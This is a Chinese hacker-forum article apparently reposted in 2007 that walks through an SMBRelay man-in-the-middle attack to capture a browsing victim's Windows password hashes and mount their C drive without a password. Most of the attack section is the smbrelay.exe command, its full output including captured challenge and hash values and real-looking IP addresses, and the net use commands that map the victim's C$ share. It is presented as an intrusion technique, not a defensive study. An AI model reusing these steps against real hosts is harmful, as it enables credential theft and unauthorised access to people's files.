SMBRELAY终极应用不需密码进浏览者硬盘 - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文

用户登录

新用户注册

SMBRELAY终极应用

★★★

【字体：小大】

SMBRELAY终极应用不需密码进浏览者硬盘

作者：不详文章来源：华盟收集点击数：更新时间：2007-11-1

SMBRELAY终极应用，不需密码进浏览者硬盘
先感谢ENVYMASK大哥的不懈指导。呵呵
说明：：这次攻击过程只需要2台机器，3个IP地址
关于协议与IP问题的说明：
我的IP是218.197.248.212，可是SMBRELAY无法运行在这个IP上，而且我只有把自己机器上“打印机与文件共享”服务删除后才能接受目标机器传来的HASH，218.197.248.154是一个不存在的IP地址，所以我把SMBRELAY绑在218.197.248.154上，测试的时候，实际上是
212（我自己）-----154（绑SMBRELAY的机器）----249（受害机器）
---------------------------------------------------------------------

以下是代码片段：
D:\>smbrelay.exe /IL 2 /IR 2 /L+ 218.197.248.154 /R- 218.197.248.154
SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Using local adapter index 2: PCI Bus Master Adapter
Local IP address added to interface 2
Bound to port 139 on address 218.197.248.154
Connection from 202.114.28.249:1915
Request type: Session Request  72 bytes
Source name: VODSER          <00>
Target name: *SMBSERVER      <20>
Setting target name to source name and source name to 'CDC4EVER'...
Response:     Positive Session Response  4 bytes

Request type: Session Message  137 bytes
SMB_COM_NEGOTIATE
Response:     Session Message  115 bytes
Challenge (8 bytes):    33C0E036880693BB

Request type: Session Message  290 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password:  FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874
Case sensitive password:    E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585
Username:     "UUSER_VODSER"
Domain:       "VODSER"
OS:           "Windows 2000 2195"
Lanman type:  "Windows 2000 5.0"
???:          ""
Response:     Session Message  154 bytes
OS:           "Windows 5.0"
Lanman type:  "Windows 2000 LAN Manager"
Domain:       "WORKGROUP"

Password hash written to disk
Connected?
Bound to port 139 on address 218.197.248.154 relaying for host VODSER 202.114.28
.249
--------------------------------------------------------------------------------

这时候，我已经抓到对方HASH了，下面是影射对方C盘

----------------------------------------

E:\>net use \\218.197.248.154
命令成功完成。

E:\>net use h: \\218.197.248.154\c$
命令成功完成。

----------------------------------------------------------------------------

第一屏的显示如下

---------------------------------------------------------

Connection rejected: 202.114.28.249 already connected
*** Relay connection for target VODSER received from 218.197.248.212:1615
*** Sent positive session response for relay target VODSER
*** Sent dialect selection response (5) for target VODSER
*** Sent SMB Session setup response for relay to VODSER
Termination requested...
Deleted incoming IP address
*** Relay disconnected from target VODSER
*** Target VODSER Disconnected
Exiting main
-------------------------------------------------------------------------

责任编辑：郭瑞　　联系方式　Email：郭瑞

电话：51228163

上一篇黑客：对shell对象的漏洞扫描

下一篇黑客：破解VistaBeta2本地密码

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913